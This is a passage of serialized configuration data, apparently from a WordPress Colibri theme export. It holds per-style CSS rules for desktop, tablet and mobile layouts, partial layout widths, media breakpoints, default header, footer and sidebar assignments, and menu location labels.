#03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:157;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:158;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-158 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:159;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:160;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:161;a:3:{s:7:\"desktop\";s:104:\"#colibri .style-161 {\n height: auto;\n min-height: unset;\n padding-top: 0px;\n padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:162;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:163;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:164;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:165;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:166;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:167;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-167 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:168;a:3:{s:7:\"desktop\";s:2366:\"#colibri .style-168 {\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-168 .widget {\n text-align: left;\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-left-width: 0px;\n border-left-style: none;\n margin-bottom: 20px;\n}\n#colibri .style-168 .widget h1,#colibri .style-168 .widget h2,#colibri .style-168 .widget h3,#colibri .style-168 .widget h4,#colibri .style-168 .widget h5,#colibri .style-168 .widget h6 {\n font-family: Open Sans;\n font-weight: 600;\n font-size: 16px;\n line-height: 1.6;\n color: rgb(0, 0, 0);\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-left-width: 0px;\n border-left-style: none;\n margin-bottom: 10px;\n}\n#colibri .style-168 .widget ul,#colibri .style-168 .widget ol {\n list-style-type: none;\n}\n#colibri .style-168 .widget ul li,#colibri .style-168 .widget ol li,#colibri .style-168 .widget .textwidget p,#colibri .style-168 .widget .calendar_wrap td ,#colibri .style-168 .widget .calendar_wrap th ,#colibri .style-168 .widget .calendar_wrap caption {\n font-family: Open Sans;\n font-weight: 400;\n text-decoration: none;\n font-size: 14px;\n color: rgb(102, 102, 102);\n padding-top: 4px;\n padding-bottom: 4px;\n}\n#colibri .style-168 .widget ul li a {\n font-family: Open Sans;\n font-weight: 400;\n text-decoration: none;\n font-size: 14px;\n color: rgb(102, 102, 102);\n}\n#colibri .style-168 .widget ul li a:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-168 .widget ul li a:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-168 .widget input:not([type=\"submit\"]) {\n font-family: Open Sans;\n font-weight: 400;\n font-size: 16px;\n color: rgb(102, 102, 102);\n border-top-width: 0px;\n border-top-color: black;\n border-top-style: none;\n border-right-width: 0px;\n border-right-color: black;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-color: black;\n border-bottom-style: none;\n border-left-width: 0px;\n border-left-color: black;\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:54:\"#colibri .style-168 .widget {\n text-align: center;\n}\n\";}i:169;a:3:{s:7:\"desktop\";s:3591:\"#colibri .style-168 .widget.widget_search {\n background-color: unset;\n background-image: none;\n border-top-width: 1px;\n border-top-color: rgb(238, 238, 238);\n border-top-style: solid;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 1px;\n border-right-color: rgb(238, 238, 238);\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: rgb(238, 238, 238);\n border-bottom-style: solid;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 1px;\n border-left-color: rgb(238, 238, 238);\n border-left-style: solid;\n padding-top: 0px;\n padding-right: 0px;\n padding-bottom: 0px;\n padding-left: 0px;\n margin-bottom: 15px;\n}\n#colibri .style-168 .widget.widget_search h1,#colibri .style-168 .widget.widget_search h2,#colibri .style-168 .widget.widget_search h3,#colibri .style-168 .widget.widget_search h4,#colibri .style-168 .widget.widget_search h5,#colibri .style-168 .widget.widget_search h6 {\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-left-width: 0px;\n border-left-style: none;\n font-size: 16px;\n color: rgb(0, 0, 0);\n}\n#colibri .style-168 .widget.widget_search input:not([type=\"submit\"]) {\n padding-top: 10px;\n padding-right: 12px;\n padding-bottom: 10px;\n padding-left: 12px;\n font-size: 16px;\n color: rgb(102, 102, 102);\n background-color: rgb(249, 250, 251);\n background-image: none;\n border-top-width: 0px;\n border-top-color: rgb(222, 222, 222);\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 0px;\n border-right-width: 0px;\n border-right-color: rgb(222, 222, 222);\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-color: rgb(222, 222, 222);\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 0px;\n border-left-width: 0px;\n border-left-color: rgb(222, 222, 222);\n border-left-style: none;\n margin-top: 0px;\n margin-right: 0px;\n margin-bottom: 0px;\n margin-left: 0px;\n}\n#colibri .style-168 .widget.widget_search input:not([type=\"submit\"])::placeholder {\n color: rgb(102, 102, 102);\n}\n#colibri .style-168 .widget.widget_search input[type=\"submit\"],#colibri .style-168 .widget.widget_search button[type=\"submit\"] {\n background-color: rgb(249, 250, 251);\n background-image: none;\n font-size: 16px;\n line-height: 1;\n color: rgb(0, 0, 0);\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 0px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 0px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n width: auto;\n padding-top: 10px;\n padding-right: 12px;\n padding-bottom: 10px;\n padding-left: 12px;\n margin-top: 0px;\n margin-right: 0px;\n margin-bottom: 0px;\n margin-left: 0px;\n transition-duration: 0.5s;\n display: inline-block;\n}\n#colibri .style-168 .widget.widget_search input[type=\"submit\"]:hover,#colibri .style-168 .widget.widget_search button[type=\"submit\"]:hover {\n color: #03a9f4;\n}\n#colibri .style-168 .widget.widget_search input[type=\"submit\"]:hover,#colibri .style-168 .widget.widget_search button[type=\"submit\"]:hover {\n color: #03a9f4;\n}\n#colibri .style-168 .widget.widget_search input[type=\"submit\"] {\n display: none;\n}\n#colibri .style-168 .widget.widget_search button[type=\"submit\"] {\n display: inline-block;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:170;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:171;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:172;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:173;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:174;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:175;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:176;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:177;a:3:{s:7:\"desktop\";s:104:\"#colibri .style-177 {\n height: auto;\n min-height: unset;\n padding-top: 0px;\n padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:178;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:179;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:180;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:181;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:182;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:183;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-183 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:184;a:3:{s:7:\"desktop\";s:2366:\"#colibri .style-184 {\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-184 .widget {\n text-align: left;\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-left-width: 0px;\n border-left-style: none;\n margin-bottom: 20px;\n}\n#colibri .style-184 .widget h1,#colibri .style-184 .widget h2,#colibri .style-184 .widget h3,#colibri .style-184 .widget h4,#colibri .style-184 .widget h5,#colibri .style-184 .widget h6 {\n font-family: Open Sans;\n font-weight: 600;\n font-size: 16px;\n line-height: 1.6;\n color: rgb(0, 0, 0);\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-left-width: 0px;\n border-left-style: none;\n margin-bottom: 10px;\n}\n#colibri .style-184 .widget ul,#colibri .style-184 .widget ol {\n list-style-type: none;\n}\n#colibri .style-184 .widget ul li,#colibri .style-184 .widget ol li,#colibri .style-184 .widget .textwidget p,#colibri .style-184 .widget .calendar_wrap td ,#colibri .style-184 .widget .calendar_wrap th ,#colibri .style-184 .widget .calendar_wrap caption {\n font-family: Open Sans;\n font-weight: 400;\n text-decoration: none;\n font-size: 14px;\n color: rgb(102, 102, 102);\n padding-top: 4px;\n padding-bottom: 4px;\n}\n#colibri .style-184 .widget ul li a {\n font-family: Open Sans;\n font-weight: 400;\n text-decoration: none;\n font-size: 14px;\n color: rgb(102, 102, 102);\n}\n#colibri .style-184 .widget ul li a:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-184 .widget ul li a:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-184 .widget input:not([type=\"submit\"]) {\n font-family: Open Sans;\n font-weight: 400;\n font-size: 16px;\n color: rgb(102, 102, 102);\n border-top-width: 0px;\n border-top-color: black;\n border-top-style: none;\n border-right-width: 0px;\n border-right-color: black;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-color: black;\n border-bottom-style: none;\n border-left-width: 0px;\n border-left-color: black;\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:54:\"#colibri .style-184 .widget {\n text-align: center;\n}\n\";}i:185;a:3:{s:7:\"desktop\";s:3591:\"#colibri .style-184 .widget.widget_search {\n background-color: unset;\n background-image: none;\n border-top-width: 1px;\n border-top-color: rgb(238, 238, 238);\n border-top-style: solid;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 1px;\n border-right-color: rgb(238, 238, 238);\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: rgb(238, 238, 238);\n border-bottom-style: solid;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 1px;\n border-left-color: rgb(238, 238, 238);\n border-left-style: solid;\n padding-top: 0px;\n padding-right: 0px;\n padding-bottom: 0px;\n padding-left: 0px;\n margin-bottom: 15px;\n}\n#colibri .style-184 .widget.widget_search h1,#colibri .style-184 .widget.widget_search h2,#colibri .style-184 .widget.widget_search h3,#colibri .style-184 .widget.widget_search h4,#colibri .style-184 .widget.widget_search h5,#colibri .style-184 .widget.widget_search h6 {\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-left-width: 0px;\n border-left-style: none;\n font-size: 16px;\n color: rgb(0, 0, 0);\n}\n#colibri .style-184 .widget.widget_search input:not([type=\"submit\"]) {\n padding-top: 10px;\n padding-right: 12px;\n padding-bottom: 10px;\n padding-left: 12px;\n font-size: 16px;\n color: rgb(102, 102, 102);\n background-color: rgb(249, 250, 251);\n background-image: none;\n border-top-width: 0px;\n border-top-color: rgb(222, 222, 222);\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 0px;\n border-right-width: 0px;\n border-right-color: rgb(222, 222, 222);\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-color: rgb(222, 222, 222);\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 0px;\n border-left-width: 0px;\n border-left-color: rgb(222, 222, 222);\n border-left-style: none;\n margin-top: 0px;\n margin-right: 0px;\n margin-bottom: 0px;\n margin-left: 0px;\n}\n#colibri .style-184 .widget.widget_search input:not([type=\"submit\"])::placeholder {\n color: rgb(102, 102, 102);\n}\n#colibri .style-184 .widget.widget_search input[type=\"submit\"],#colibri .style-184 .widget.widget_search button[type=\"submit\"] {\n background-color: rgb(249, 250, 251);\n background-image: none;\n font-size: 16px;\n line-height: 1;\n color: rgb(0, 0, 0);\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 0px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 0px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n width: auto;\n padding-top: 10px;\n padding-right: 12px;\n padding-bottom: 10px;\n padding-left: 12px;\n margin-top: 0px;\n margin-right: 0px;\n margin-bottom: 0px;\n margin-left: 0px;\n transition-duration: 0.5s;\n display: inline-block;\n}\n#colibri .style-184 .widget.widget_search input[type=\"submit\"]:hover,#colibri .style-184 .widget.widget_search button[type=\"submit\"]:hover {\n color: #03a9f4;\n}\n#colibri .style-184 .widget.widget_search input[type=\"submit\"]:hover,#colibri .style-184 .widget.widget_search button[type=\"submit\"]:hover {\n color: #03a9f4;\n}\n#colibri .style-184 .widget.widget_search input[type=\"submit\"] {\n display: none;\n}\n#colibri .style-184 .widget.widget_search button[type=\"submit\"] {\n display: inline-block;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:186;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:187;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:188;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:189;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:190;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:191;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}}s:14:\"cssByPartialId\";a:9:{i:22;a:10:{s:11:\"local-22-h4\";a:2:{s:7:\"desktop\";s:299:\"#colibri .style-local-22-h4-outer {\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n width: auto;\n max-width: 100%;\n}\n#colibri .h-navigation_sticky .style-local-22-h4-outer,#colibri .h-navigation_sticky.style-local-22-h4-outer {\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n width: auto;\n max-width: 100%;\n}\n\";s:6:\"mobile\";s:221:\"#colibri .style-local-22-h4-outer {\n flex: 1 1 0;\n -ms-flex: 1 1 0%;\n}\n#colibri .h-navigation_sticky .style-local-22-h4-outer,#colibri .h-navigation_sticky.style-local-22-h4-outer {\n flex: 1 1 0;\n -ms-flex: 1 1 0%;\n}\n\";}s:11:\"local-22-h6\";a:1:{s:7:\"desktop\";s:92:\"#colibri .style-local-22-h6-outer {\n flex: 1 1 0;\n -ms-flex: 1 1 0%;\n max-width: 100%;\n}\n\";}s:11:\"local-22-h8\";a:1:{s:7:\"desktop\";s:299:\"#colibri .style-local-22-h8-outer {\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n width: auto;\n max-width: 100%;\n}\n#colibri .h-navigation_sticky .style-local-22-h8-outer,#colibri .h-navigation_sticky.style-local-22-h8-outer {\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n width: auto;\n max-width: 100%;\n}\n\";}s:12:\"local-22-h14\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-22-h14-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-22-h17\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-22-h17-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-22-h27\";a:3:{s:7:\"desktop\";s:94:\"#colibri .style-local-22-h27-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"tablet\";s:54:\"#colibri .style-local-22-h27-outer {\n width: 80% ;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-22-h27-outer {\n width: 100% ;\n}\n\";}s:12:\"local-22-h21\";a:2:{s:7:\"desktop\";s:94:\"#colibri .style-local-22-h21-outer {\n width: 75% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-22-h21-outer {\n width: 100% ;\n}\n\";}s:12:\"local-22-h23\";a:2:{s:7:\"desktop\";s:94:\"#colibri .style-local-22-h23-outer {\n width: 25% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-22-h23-outer {\n width: 100% ;\n}\n\";}s:12:\"local-22-h33\";a:3:{s:7:\"desktop\";s:94:\"#colibri .style-local-22-h33-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"tablet\";s:54:\"#colibri .style-local-22-h33-outer {\n width: 80% ;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-22-h33-outer {\n width: 100% ;\n}\n\";}s:12:\"local-22-h34\";a:1:{s:7:\"desktop\";s:0:\"\";}}i:25;a:8:{s:12:\"local-25-h14\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-25-h14-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-25-h17\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-25-h17-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-25-h21\";a:2:{s:7:\"desktop\";s:94:\"#colibri .style-local-25-h21-outer {\n width: 75% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-25-h21-outer {\n width: 100% ;\n}\n\";}s:12:\"local-25-h23\";a:2:{s:7:\"desktop\";s:94:\"#colibri .style-local-25-h23-outer {\n width: 25% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-25-h23-outer {\n width: 100% ;\n}\n\";}s:12:\"local-25-h27\";a:1:{s:7:\"desktop\";s:95:\"#colibri .style-local-25-h27-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:11:\"local-25-h8\";a:1:{s:7:\"desktop\";s:299:\"#colibri .style-local-25-h8-outer {\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n width: auto;\n max-width: 100%;\n}\n#colibri .h-navigation_sticky .style-local-25-h8-outer,#colibri .h-navigation_sticky.style-local-25-h8-outer {\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n width: auto;\n max-width: 100%;\n}\n\";}s:11:\"local-25-h6\";a:1:{s:7:\"desktop\";s:92:\"#colibri .style-local-25-h6-outer {\n flex: 1 1 0;\n -ms-flex: 1 1 0%;\n max-width: 100%;\n}\n\";}s:11:\"local-25-h4\";a:2:{s:7:\"desktop\";s:299:\"#colibri .style-local-25-h4-outer {\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n width: auto;\n max-width: 100%;\n}\n#colibri .h-navigation_sticky .style-local-25-h4-outer,#colibri .h-navigation_sticky.style-local-25-h4-outer {\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n width: auto;\n max-width: 100%;\n}\n\";s:6:\"mobile\";s:221:\"#colibri .style-local-25-h4-outer {\n flex: 1 1 0;\n -ms-flex: 1 1 0%;\n}\n#colibri .h-navigation_sticky .style-local-25-h4-outer,#colibri .h-navigation_sticky.style-local-25-h4-outer {\n flex: 1 1 0;\n -ms-flex: 1 1 0%;\n}\n\";}}i:28;a:1:{s:11:\"local-28-f4\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-28-f4-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}}i:31;a:10:{s:11:\"local-31-m4\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:94:\"#colibri .style-local-31-m4-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:13:\"dynamic-31-m5\";a:1:{s:7:\"desktop\";s:59:\".site .style-dynamic-31-m5-height {\n min-height: 300px;\n}\n\";}s:11:\"local-31-m7\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-31-m7-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-31-m11\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-31-m13\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-31-m16\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-31-m18\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-31-m21\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-31-m21-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-31-m23\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-31-m23-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-31-m31\";a:1:{s:7:\"desktop\";s:95:\"#colibri .style-local-31-m31-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}}i:34;a:8:{s:11:\"local-34-m4\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:94:\"#colibri .style-local-34-m4-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:13:\"dynamic-34-m5\";a:1:{s:7:\"desktop\";s:59:\".site .style-dynamic-34-m5-height {\n min-height: 300px;\n}\n\";}s:11:\"local-34-m7\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-34-m7-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-34-m13\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-34-m13-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-34-m15\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-34-m15-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-34-m19\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-34-m21\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-34-m23\";a:1:{s:7:\"desktop\";s:0:\"\";}}i:37;a:1:{s:11:\"local-37-m3\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:94:\"#colibri .style-local-37-m3-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}}i:40;a:7:{s:11:\"local-40-m3\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:94:\"#colibri .style-local-40-m3-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:11:\"local-40-m5\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-40-m5-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-40-m13\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-40-m14\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-40-m16\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-40-m18\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-40-m21\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-40-m21-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}}i:43;a:1:{s:11:\"local-43-s4\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-43-s4-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}}i:46;a:1:{s:11:\"local-46-s4\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-46-s4-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}}}s:6:\"medias\";a:3:{s:7:\"desktop\";a:6:{s:2:\"id\";s:7:\"desktop\";s:5:\"label\";s:7:\"desktop\";s:4:\"icon\";s:15:\"desktop_windows\";s:4:\"show\";b:1;s:4:\"main\";b:1;s:10:\"gridPrefix\";s:2:\"lg\";}s:6:\"tablet\";a:7:{s:2:\"id\";s:6:\"tablet\";s:5:\"label\";s:6:\"tablet\";s:4:\"icon\";s:14:\"tablet_android\";s:4:\"show\";b:0;s:5:\"width\";i:1024;s:10:\"gridPrefix\";s:2:\"md\";s:5:\"query\";s:49:\"@media (min-width: 768px) and (max-width: 1023px)\";}s:6:\"mobile\";a:6:{s:2:\"id\";s:6:\"mobile\";s:5:\"label\";s:6:\"mobile\";s:4:\"icon\";s:13:\"phone_android\";s:4:\"show\";b:0;s:5:\"width\";i:480;s:5:\"query\";s:25:\"@media (max-width: 767px)\";}}s:8:\"defaults\";a:1:{s:8:\"partials\";a:4:{s:7:\"sidebar\";a:6:{s:10:\"front_page\";i:-1;s:4:\"page\";i:-1;s:4:\"post\";i:43;s:12:\"archive_post\";i:-1;s:7:\"product\";i:46;s:15:\"archive_product\";i:-1;}s:6:\"header\";a:6:{s:10:\"front_page\";i:22;s:4:\"page\";i:-1;s:4:\"post\";i:25;s:12:\"archive_post\";i:-1;s:7:\"product\";i:-1;s:15:\"archive_product\";i:-1;}s:6:\"footer\";a:6:{s:10:\"front_page\";i:-1;s:4:\"page\";i:-1;s:4:\"post\";i:28;s:12:\"archive_post\";i:-1;s:7:\"product\";i:-1;s:15:\"archive_product\";i:-1;}s:4:\"main\";a:6:{i:404;i:37;s:4:\"post\";i:31;s:7:\"archive\";i:34;s:15:\"archive_product\";i:1732;s:7:\"product\";i:1729;s:6:\"search\";i:40;}}}s:4:\"menu\";a:4:{s:16:\"defaultLocations\";a:3:{s:6:\"header\";a:2:{i:0;a:3:{s:2:\"id\";s:11:\"header-menu\";s:5:\"label\";s:19:\"Header primary menu\";s:8:\"priority\";i:1;}i:1;a:3:{s:2:\"id\";s:13:\"header-menu-1\";s:5:\"label\";s:21:\"Header secondary menu\";s:8:\"priority\";i:2;}}s:7:\"content\";a:1:{i:0;a:3:{s:2:\"id\";s:12:\"content-menu\";s:5:\"label\";s:12:\"In Page Menu\";s:8:\"priority\";i:1;}}s:6:\"footer\";a:2:{i:0;a:3:{s:2:\"id\";s:11:\"footer-menu\";s:5:\"label\";s:19:\"Footer primary 